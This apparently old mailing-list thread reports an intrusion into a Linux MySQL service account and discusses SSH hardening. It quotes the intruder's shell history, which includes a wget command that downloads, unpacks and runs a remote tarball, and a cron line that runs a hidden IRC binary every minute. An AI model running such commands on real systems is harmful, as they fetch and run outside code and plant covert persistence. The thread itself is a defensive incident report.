mysql scammer

Just noticed some clown logged into my mysql account and set up a cron
job to do some sneaky IRC stuff. Here's what he did:

Logged in:
mysql pts/0 acb45939.ipt.aol Thu Mar 8 09:00 - 09:01
(00:01)

Then ran these commands:
30 w
31 uname -a
32 passwd
33 ls -a
34 wget www.freewebtown.com/gavana123/rr.tgz ;tar xzvf rr.tgz ;rm -
rf rr.tgz ;cd " web " ;./configure
35 ./fuck
36 ./go
37 ps aux
38 passwd
39 exit

This started a cron job that did some IRC stuff every minute. This
was just a toy machine, so I'm not worried about it, but wanted to let
others know this junk is out there. Look for a " web " directory in
~mysql, check /var/log/messages for a lot of cron junk like this:

Mar 12 04:59:01 localhost crond[25028]: (mysql) CMD (/var/lib/mysql/
web /y2kupdate >/dev/null 2>&1)

In /var/spool/cron
* * * * * /var/lib/mysql/ web /y2kupdate >/dev/null 2>&1

> Just noticed some clown logged into my mysql account and set up a cron
> job to do some sneaky IRC stuff. Here's what he did:
>
> Logged in:
> mysql pts/0 acb45939.ipt.aol Thu Mar 8 09:00 - 09:01
> (00:01)

MySQL has a shell? Forgive my ignorance, as I am not a linux or unix
guru, but I would not suspect that you could actually log in as mysql
with a shell and fool around...

--
Willem Bogaerts

Application smith
Kratz B.V.
http://www.kratz.nl/

Willem Bogaerts wrote:
> MySQL has a shell? Forgive my ignorance, as I am not a linux or unix
> guru, but I would not suspect that you could actually log in as mysql
> with a shell and fool around...

Being paranoid, I just checked a couple of systems here.

I found one mysql account on a RedHat 9 box, with a password of mysql, and a
valid shell. rpm -q mysql says "mysql-3.23.41-1"
Password and shell zapped, I wonder what/who's system I just broke.... (It was
on some other user's old support system)

That particular machine is not connected to the internet, but if that is the
default configuration, there are probably thousands out there.

Clues for the clueless:
If you allow telnet access to your machine, you're insane.
If you allow SSH access to your machine, using passwords, you're insane.

SSH, if configured to allow connections from outside, should permit access only
via public/secret keys; That usually means the following in /etc/sshd.conf

RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
PasswordAuthentication no

followed by some ssh-keygen -t rsa on the clients, some copying of .pub files
into lines in ~user/.ssh/authorized_keys, appropriate permissions set on .ssh
and .ssh/authorized_keys, and possibly moving the SSH port to somewhere else to
avoid the log-file-filling brute force password attacks that happen from time to
time (They wont succeed, but they waste bandwidth and log space).

(and of course, you need to keep your SSH install up-to-date as there are some
very hairy security problems in not-too-distant earlier releases)